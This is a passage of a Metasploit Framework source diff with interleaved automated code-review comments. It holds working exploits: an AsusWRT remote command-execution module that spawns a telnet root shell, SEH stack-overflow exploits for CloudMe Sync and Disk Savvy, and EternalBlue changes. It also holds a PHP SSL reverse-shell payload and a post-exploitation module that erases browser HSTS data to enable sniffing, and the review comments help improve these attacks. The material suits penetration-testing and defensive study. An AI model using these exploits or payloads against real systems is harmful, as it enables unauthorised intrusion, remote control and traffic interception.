+ }, + 'Author' => + [ + 'Pedro Ribeiro ' # Vulnerability discovery and Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], + ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], + ['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], + ['CVE', '2018-5999'], + ['CVE', '2018-6000'] + ], + 'Targets' => + [ + [ 'AsusWRT < v3.0.0.4.384.10007', + { + 'Payload' => + { + 'Compat' => { + 'PayloadType' => 'cmd_interact', + 'ConnectionType' => 'find', + }, + }, + } + ], + ], + 'Privileged' => true, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, + 'DisclosureDate' => 'Jan 22 2018', + 'DefaultTarget' => 0)) + register_options( + [ + Opt::RPORT(9999) + ]) + + register_advanced_options( + [ + OptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) + ]) + end + + def exploit + # first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD + # this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! + post_data = Rex::MIME::Message.new + post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"") + + data = post_data.to_s + + res = send_request_cgi({ + 'uri' => "/vpnupload.cgi", + 'method' => 'POST', + 'rport' => datastore['ASUSWRTPORT'], + 'data' => data, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" + }) + + if res and res.code == 200 + print_good("#{peer} - Successfully set the ateCommand_flag variable.") + else + fail_with(Failure::Unknown, "#{peer} - Failed to set ateCommand_flag variable.") + end + + + # ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. 
+ info_pdu_size = 512 # expected packet size, not sure what the extra bytes are + r = Random.new + + ibox_comm_pkt_hdr_ex = + [0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC + [0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 + [0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 + r.bytes(4) + # Info, don't know what this is + r.bytes(6) + # MAC address + r.bytes(32) # Password + + telnet_port = rand((2**16)-1024)+1024 + cmd = "/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}" + [0x00].pack('C*') + pkt_syscmd = + [cmd.length,0x00].pack('C*') + # cmd length + cmd # our command + + pkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) + + connect_udp + udp_sock.put(pkt_final) # we could process the response, but we don't care + disconnect_udp + + print_status("#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}") + sleep(10) + + begin + ctx = { 'Msf' => framework, 'MsfExploit' => self } + sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) + if not sock.nil? + print_good("#{peer} - Success, shell incoming!") + return handler(sock) + end + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e + sock.close if sock + end + + print_bad("#{peer} - Well that didn't work... try again?") + end +end diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index b4f9e873e8..96864ee5b4 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb 
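Review bot: In `exploit`, `post_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = "form-data; name=\"ateCommand_flag\"")` assigns three locals that are never read; Ruby passes them positionally, which works, but it reads like keyword arguments that `add_part` does not take — write `post_data.add_part('1', nil, nil, 'form-data; name="ateCommand_flag"')`. In the same method `if res and res.code == 200` should use `&&`, `if not sock.nil?` is simply `if sock`, and the `=> e` binding on the `rescue` list is unused. `telnet_port = rand((2**16)-1024)+1024` produces the same 1024..65535 range as the clearer `rand(1024..65535)`, and `info_pdu_size` would benefit from a comment naming where the 512-byte size comes from, since the existing one admits it is not understood.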
@@ -106,7 +106,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index f2304c91a6..5742000cc3 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 0cf2138f9e..4fe890b696 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -109,7 +109,7 @@ class MetasploitModule < Msf::Exploit::Remote return false unless ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil conn end diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index bff7067f67..5fb276c2ba 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb 
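Review bot: Dropping the `'/bin/bash -i'` argument in `exagrid_known_privkey.rb` changes what the remote side runs: the old call exec'd an interactive bash, while `Net::SSH::CommandStream.new(ssh_socket)` now asks the server for its login shell via a `shell` channel request (per the `command_stream.rb` change), so an account whose login shell is not bash, or is restricted, will behave differently. The same switch applies to the `/bin/bash` callers in `loadbalancerorg_enterprise_known_privkey.rb` and `quantum_dxi_known_privkey.rb`. If the bash dependence was incidental this is fine; if it was deliberate, keep the argument, e.g. `Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i')`. The surrounding method starts and ends outside the hunk.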
@@ -103,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3c4ef23169..0d8a939067 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash', true) + conn = Net::SSH::CommandStream.new(ssh_socket) ssh_socket = nil return conn diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 48714417a1..d2c4f96ea6 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -114,7 +114,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, 'shell-escape', true) + conn = Net::SSH::CommandStream.new(ssh, 'shell-escape') return conn end diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 6f812d10fb..b48a856c9b 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote end if ssh - conn = Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh) ssh = nil return conn end diff --git a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb index 84d547712a..4094cb72a6 100644 
--- a/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb +++ b/modules/exploits/linux/ssh/ubiquiti_airos_file_upload.rb @@ -153,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote private: private_key, private_type: :ssh_key ) - return Net::SSH::CommandStream.new(ssh, '/bin/sh', true) + return Net::SSH::CommandStream.new(ssh) end nil diff --git a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb index a914837815..6a688756a5 100644 --- a/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb +++ b/modules/exploits/linux/ssh/vmware_vdp_known_privkey.rb @@ -102,7 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote if ssh_socket # Create a new session from the socket, then dump it. - conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true) + conn = Net::SSH::CommandStream.new(ssh_socket) self.sockets.delete(ssh_socket.transport.socket) return conn diff --git a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb index 4ee91ab322..778902cb34 100644 --- a/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb +++ b/modules/exploits/unix/ssh/array_vxag_vapv_privkey_privesc.rb @@ -186,6 +186,6 @@ class MetasploitModule < Msf::Exploit::Remote # Make the SSH connection and execute our commands + payload print_status("#{rhost}:#{rport} - Sending and executing payload to gain root privileges!") - Net::SSH::CommandStream.new(ssh, build_command, true) + Net::SSH::CommandStream.new(ssh, build_command) end end diff --git a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb index 53a0a22034..85064b1092 100644 --- a/modules/exploits/unix/ssh/tectia_passwd_changereq.rb +++ b/modules/exploits/unix/ssh/tectia_passwd_changereq.rb 
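Review bot: The array_vxag hunk is the only call in this series that keeps its command (`build_command`) while dropping only the trailing `true`; every other hunk drops both arguments, so this one depends entirely on what that third positional meant (presumably a cleanup/close flag, which is not visible here). If the flag still exists in the new signature, `Net::SSH::CommandStream.new(ssh, build_command, true)` preserves the old behaviour; if it was removed, a one-line comment on the new call saying the connection is now closed by the stream itself would make the intent checkable. The enclosing `exploit` method ends inside the hunk but begins outside it.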
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote message = transport.next_message.type if message.to_i == 6 #SSH2_MSG_SERVICE_ACCEPT - shell = Net::SSH::CommandStream.new(connection, '/bin/sh', true) + shell = Net::SSH::CommandStream.new(connection) connection = nil return shell end diff --git a/modules/exploits/windows/misc/cloudme_sync.rb b/modules/exploits/windows/misc/cloudme_sync.rb new file mode 100644 index 0000000000..5d6d885004 --- /dev/null +++ b/modules/exploits/windows/misc/cloudme_sync.rb @@ -0,0 +1,67 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CloudMe Sync v1.10.9', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in CloudMe Sync v1.10.9 client application. This module has been + tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'hyp3rlinx', # Original exploit author + 'Daniel Teixeira' # MSF module author + ], + 'References' => + [ + [ 'CVE', '2018-6892'], + [ 'EDB', '44027' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ 'CloudMe Sync v1.10.9', + { + 'Offset' => 2232, + 'Ret' => 0x61e7b7f6 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 17 2018', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(8888)]) + + end + + def exploit + connect + + buffer = make_nops(target['Offset']) + buffer << generate_seh_record(target.ret) + buffer << payload.encoded + + sock.put(buffer) + handler + end +end 
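Review bot: The target's `'Ret' => 0x61e7b7f6` carries no comment saying which module the POP/POP/RET gadget comes from or why that module is usable (no ASLR/SafeSEH), so anyone porting this to another build has nothing to go on; at minimum `'Ret' => 0x61e7b7f6 # pop/pop/ret — record the DLL and version this came from`. In `exploit`, `handler` runs with the connection still open; the usual shape is `sock.put(buffer)`, `handler`, `disconnect` so the socket is not left to module teardown. The `Payload` hash sets no `Space`, unlike the disk_savvy module added in the same commit; if the overflowed buffer is bounded, a `Space` limit stops the framework from producing a payload that gets truncated. The name would also conventionally carry the vulnerability class, e.g. `'CloudMe Sync v1.10.9 Stack Buffer Overflow'`.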
diff --git a/modules/exploits/windows/misc/disk_savvy_adm.rb b/modules/exploits/windows/misc/disk_savvy_adm.rb new file mode 100644 index 0000000000..de4da979a3 --- /dev/null +++ b/modules/exploits/windows/misc/disk_savvy_adm.rb @@ -0,0 +1,77 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Disk Savvy Enterprise v10.4.18', + 'Description' => %q{ + This module exploits a stack-based buffer overflow vulnerability + in Disk Savvy Enterprise v10.4.18, caused by improper bounds + checking of the request sent to the built-in server. This module + has been tested successfully on Windows 7 SP1 x86. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Daniel Teixeira' + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'thread' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x02\x0a\x0d\xf8", + 'Space' => 800 + }, + 'Targets' => + [ + [ 'Disk Savvy Enterprise v10.4.18', + { + 'Offset' => 124, + 'Ret' => 0x10056d13 + } + ] + ], + 'Privileged' => true, + 'DisclosureDate' => 'Jan 31 2017', + 'DefaultTarget' => 0)) + + register_options([Opt::RPORT(9124)]) + + end + + def exploit + seh = generate_seh_record(target.ret) + connect + + buffer = make_nops(target['Offset']) + buffer << seh + buffer << "\x83\xc4\x7f" * 13 #ADD esp,7fh + buffer << "\x83\xc4\x21" #ADD esp,21h + buffer << "\xff\xe4" #JMP esp + buffer << payload.encoded + buffer << Rex::Text.rand_text_alphanumeric(1) + + header = "\x75\x19\xba\xab" + header << "\x03\x00\x00\x00" + header << "\x00\x40\x00\x00" + header << [buffer.length].pack("V") + header << [buffer.length].pack("V") + header << [buffer[-1].ord].pack("V") + packet = header + packet << buffer + + sock.put(packet) + handler + end +end 
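Review bot: The protocol header built in `exploit` is a run of undocumented magic — `"\x75\x19\xba\xab"`, `"\x03\x00\x00\x00"`, `"\x00\x40\x00\x00"`, the buffer length twice and `[buffer[-1].ord].pack("V")` — and nothing tells the reader which field the server bounds-checks badly or why the last byte of the buffer is echoed into the header; each line should get a trailing comment naming the field as far as it is known, and the trailing `Rex::Text.rand_text_alphanumeric(1)` should say it exists to feed that last-byte field. The `ADD esp` stub is likewise stated in opcodes only; a comment giving the total (`13 * 0x7f + 0x21 = 0x694` bytes) and what esp is expected to point at afterwards would make the `'Space' => 800` choice checkable. The info hash has no `References` entry at all for a January 2017 disclosure; add whatever advisory or exploit-db entry the author worked from. As with the sibling CloudMe module, a `disconnect` after `handler` and a name carrying the vulnerability class (`'Disk Savvy Enterprise v10.4.18 Stack Buffer Overflow'`) would match framework conventions.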
diff --git a/modules/exploits/windows/smb/ms17_010_eternalblue.rb b/modules/exploits/windows/smb/ms17_010_eternalblue.rb index 34582476a6..022cfe0a6f 100644 --- a/modules/exploits/windows/smb/ms17_010_eternalblue.rb +++ b/modules/exploits/windows/smb/ms17_010_eternalblue.rb @@ -59,7 +59,8 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DefaultOptions' => { - 'EXITFUNC' => 'thread', + 'EXITFUNC' => 'thread', + 'WfsDelay' => 5, }, 'Privileged' => true, 'Payload' => @@ -120,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote # we don't need this sleep, and need to find a way to remove it # problem is session_count won't increment until stage is complete :\ secs = 0 - while !session_created? and secs < 5 + while !session_created? and secs < 30 secs += 1 sleep 1 end @@ -139,16 +140,24 @@ class MetasploitModule < Msf::Exploit::Remote rescue EternalBlueError => e print_error("#{e.message}") + return false + rescue ::RubySMB::Error::NegotiationFailure + print_error("SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.") + return false rescue ::RubySMB::Error::UnexpectedStatusCode, ::Errno::ECONNRESET, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, - ::Rex::ConnectionRefused => e + ::Rex::ConnectionRefused, + ::RubySMB::Error::CommunicationError => e print_error("#{e.class}: #{e.message}") + report_failure + return false rescue => error print_error(error.class.to_s) print_error(error.message) print_error(error.backtrace.join("\n")) + return false ensure # pass end @@ -286,6 +295,7 @@ class MetasploitModule < Msf::Exploit::Remote end end + ''' # # Increase the default delay by five seconds since some kernel-mode # payloads may not run immediately. @@ -293,7 +303,7 @@ class MetasploitModule < Msf::Exploit::Remote def wfs_delay super + 5 end - + ''' def smb2_grooms(grooms, payload_hdr_pkt) grooms.times do |groom_id| 
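Review bot: In the reworked `rescue` chain `report_failure` is only called in the connection-error branch (`UnexpectedStatusCode`, `ECONNRESET`, ..., `CommunicationError`), while the new `NegotiationFailure` branch, the `EternalBlueError` branch and the catch-all just print and `return false`; if `report_failure` is what records the failed attempt for the framework, those outcomes are equally final and should call it too, i.e. `report_failure` before each `return false`. The `NegotiationFailure` message presents the lsass-crash reboot as the likely cause; since a negotiation failure can presumably also just mean SMBv1 is unavailable, wording it as one possibility ("often occurs when lsass crashes; if so the target may reboot") keeps the operator from waiting on a reboot that never comes. The enclosing method starts outside the hunk.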
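Review bot: The `'''` added before the `wfs_delay` override and the matching `'''` after it are not a block comment in Ruby — `'''` parses as an empty string literal followed by the start of a new single-quoted string, so the override is only disabled because the whole region is swallowed into a string-literal expression statement, and the trick breaks the moment an apostrophe appears in the commented-out text. Since `'WfsDelay' => 5` in `DefaultOptions` now carries the delay, delete the dead `wfs_delay` method outright, or if it must stay for reference use Ruby's `=begin` / `=end`. Note that the old override added five seconds to the option's default whereas the new default sets it to exactly five; if that difference is intended, a comment next to `'WfsDelay' => 5` saying so would help.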
@@ -337,7 +347,11 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Sending malformed Trans2 packets") sock.put(trans2_pkt_nulled) - sock.get_once + begin + sock.get_once + rescue EOFError + vprint_error("No response back from SMB echo request. Continuing anyway...") + end client.echo(count:1, data: "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00") end diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb index d4740e5e39..bd65a0861e 100644 --- a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 132 + CachedSize = 253 include Msf::Payload::Single include Msf::Sessions::CommandShellOptions @@ -49,6 +49,6 @@ module MetasploitModule lhost = datastore['LHOST'] ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) - cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&" + cmd = "php -r '$ctxt=stream_context_create([\"ssl\"=>[\"verify_peer\"=>false]]);while($s=@stream_socket_client(\"ssl://#{datastore['LHOST']}:#{datastore['LPORT']}\",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}}'&" end end diff --git a/modules/post/multi/manage/hsts_eraser.rb b/modules/post/multi/manage/hsts_eraser.rb new file mode 100644 index 0000000000..8d336bf96b --- /dev/null +++ b/modules/post/multi/manage/hsts_eraser.rb 
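Review bot: The new `rescue EOFError` message says no response came back from the SMB echo request, but the `sock.get_once` it guards follows `sock.put(trans2_pkt_nulled)`; the echo is the `client.echo` call on the next line, so the text should read e.g. `vprint_error("No response to the malformed Trans2 packets (EOF). Continuing anyway...")`. An `EOFError` here means the peer closed the connection, so the `client.echo` that follows presumably reuses a dead transport and will raise in turn; unless the peer closing at this point is an expected part of the exploit, returning false (or letting the error reach the handlers in `exploit`) gives a clearer failure than continuing. The enclosing method starts outside the hunk.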
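Review bot: The rewritten `cmd` still interpolates `datastore['LHOST']` even though the two context lines above it compute `lhost` specifically to wrap an IPv6 address in brackets, so the IPv6 handling the method prepares is never used; the URL should be `ssl://#{lhost}:#{datastore['LPORT']}`. The stream context only sets `\"verify_peer\"=>false`; PHP since 5.6 also verifies the peer name by default and the framework's SSL handler presents a self-signed certificate whose CN will not match the listener address, so `\"verify_peer_name\"=>false` is presumably needed as well for the connect to succeed — worth testing against a current PHP. The `@` on `stream_socket_client` also hides the connect error, so a failing handshake just ends the outer loop silently. The enclosing method starts outside the hunk.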
@@ -0,0 +1,130 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Post + include Msf::Post::File + include Msf::Post::Windows::UserProfiles + include Msf::Post::OSX::System + include Msf::Post::Unix + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Web browsers HSTS entries eraser', + 'Description' => %q{ + This module removes the HSTS database of the following tools and web browsers: Mozilla Firefox, + Google Chrome, Opera, Safari and wget. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Sheila A. Berta (UnaPibaGeek)', # ElevenPaths + ], + 'Platform' => %w(linux osx unix win), + 'Arch' => [ARCH_X86,ARCH_X64], + 'References' => + [ + [ 'URL', 'http://blog.en.elevenpaths.com/2017/12/breaking-out-hsts-and-hpkp-on-firefox.html' ], + [ 'URL', 'https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf' ] + ], + 'SessionTypes' => %w(meterpreter shell) + )) + + register_options([ + OptBool.new('DISCLAIMER', + [true, 'This module will delete HSTS data from the target. Set this parameter to True in order to accept this warning.', false]) + ]) + end + + def run + unless (datastore['DISCLAIMER'] == true) + print_error("This module will delete HSTS data from all browsers on the target. 
You must set the DISCLAIMER option to True to acknowledge that you understand this warning.") + return + end + + profiles = user_profiles + + profiles.each do |user_profile| + account = user_profile['UserName'] + browsers_hsts_db_path = {} + + case session.platform + when 'windows' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\TransportSecurity", + 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", #Just path for now + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\TransportSecurity" + } + when 'unix', 'linux' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/TransportSecurity", + 'wget' => "#{user_profile['LocalAppData']}/.wget-hsts" + } + when 'osx' + browsers_hsts_db_path = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/TransportSecurity", + 'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", #Just path for now + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/TransportSecurity", + 'Safari' => "#{user_profile['AppData']}/Cookies/HSTS.plist" + } + else + print_error "Platform not recognized: #{session.platform}" + end + + browsers_hsts_db_path.each_pair do |browser, path| + if browser == 'Firefox' + hsts_db_path = [] + if directory?(path) + files = dir(path) + files.reject! { |file| %w(. ..).include?(file) } + files.each do |file_path| + hsts_db_path.push([path, file_path, 'SiteSecurityServiceState.txt'].join(system_separator)) if file_path.match(/.*\.default/) + end + end + path = hsts_db_path[0] + end + if !path.nil? and file?(path) + print_status "Removing #{browser} HSTS database for #{account}... " + file_rm(path) + end + end + end + + print_status "HSTS databases removed! 
Now enjoy your favorite sniffer! ;-)" + + end + + def user_profiles + user_profiles = [] + case session.platform + when /unix|linux/ + user_names = dir("/home") + user_names.reject! { |u| %w(. ..).include?(u) } + user_names.each do |user_name| + user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") + end + when /osx/ + user_names = session.shell_command("ls /Users").split + user_names.reject! { |u| u == 'Shared' } + user_names.each do |user_name| + user_profiles.push( + 'UserName' => user_name, + "AppData" => "/Users/#{user_name}/Library", + "LocalAppData" => "/Users/#{user_name}/Library/Application Support" + ) + end + when /windows/ + user_profiles |= grab_user_profiles + else + print_error "Error getting user profile data!" + end + user_profiles + end + + def system_separator + return session.platform == 'windows' ? '\\' : '/' + end +end diff --git a/plugins/wmap.rb b/plugins/wmap.rb index 6039d7a159..9016171098 100644 --- a/plugins/wmap.rb +++ b/plugins/wmap.rb @@ -140,11 +140,11 @@ class Plugin::Wmap < Msf::Plugin end when '-d' del_idx = args - if del_idx + if !del_idx.empty? delete_sites(del_idx.select {|d| d =~ /^[0-9]*$/}.map(&:to_i).uniq) return else - print_error("Provide index of site to delete") + print_error("No index provided.") end when '-l' view_sites diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 8cf970240b..ae0e104270 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb 
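Review bot: The Firefox branch in `run` collects every `*.default` profile directory but then keeps only `hsts_db_path[0]`, so a user with more than one profile (the unanchored `/.*\.default/` matches both `xxxxxxxx.default` and `xxxxxxxx.default-release`) keeps HSTS state in the ones that are skipped, and the closing `print_status "HSTS databases removed! ..."` is printed even when nothing was found. Iterating over all resolved paths and counting what was targeted makes the final message honest; the loop below is one way to do it, with the profile lookup otherwise kept as it is. Note also that `file?` and `file_rm` run with the session's privileges, so for other users' profiles on a non-root session the deletion will presumably fail without this module noticing. `run` begins and ends inside the hunk, which is the whole new file.
```ruby
    removed = 0
    profiles.each do |user_profile|
      # … unchanged: account / per-platform browsers_hsts_db_path tables …
      browsers_hsts_db_path.each_pair do |browser, path|
        candidates = [path]
        if browser == 'Firefox'
          candidates = []
          if directory?(path)
            dir(path).reject { |f| %w(. ..).include?(f) }.each do |entry|
              next unless entry.match(/\.default/)
              candidates << [path, entry, 'SiteSecurityServiceState.txt'].join(system_separator)
            end
          end
        end
        candidates.each do |db|
          next unless file?(db)
          print_status "Removing #{browser} HSTS database for #{account}... "
          file_rm(db)
          removed += 1
        end
      end
    end

    if removed.zero?
      print_status "No HSTS databases found."
    else
      print_status "#{removed} HSTS database(s) removed! Now enjoy your favorite sniffer! ;-)"
    end
```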
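Review bot: `if !del_idx.empty?` in the wmap hunk reads better as `unless del_idx.empty?` (or `if del_idx.any?`), and the new message `No index provided.` drops the hint the old one gave about what to provide; `print_error("No site index provided; use -d <index>")` keeps it (the exact flag syntax is only partly visible here). On the unchanged line below, `/^[0-9]*$/` matches an empty argument and, being line-anchored, a multi-line one as well, with `"".to_i` quietly becoming index 0; `/\A[0-9]+\z/` is the safer filter. The enclosing `case` and method start outside the hunk.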
@@ -1971,6 +1971,28 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'osx/x64/exec' end + context 'osx/x64/meterpreter/bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/bind_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/bind_tcp' + end + + context 'osx/x64/meterpreter/reverse_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'stagers/osx/x64/reverse_tcp', + 'stages/osx/x64/meterpreter' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'osx/x64/meterpreter/reverse_tcp' + end + context 'osx/x64/meterpreter_reverse_http' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [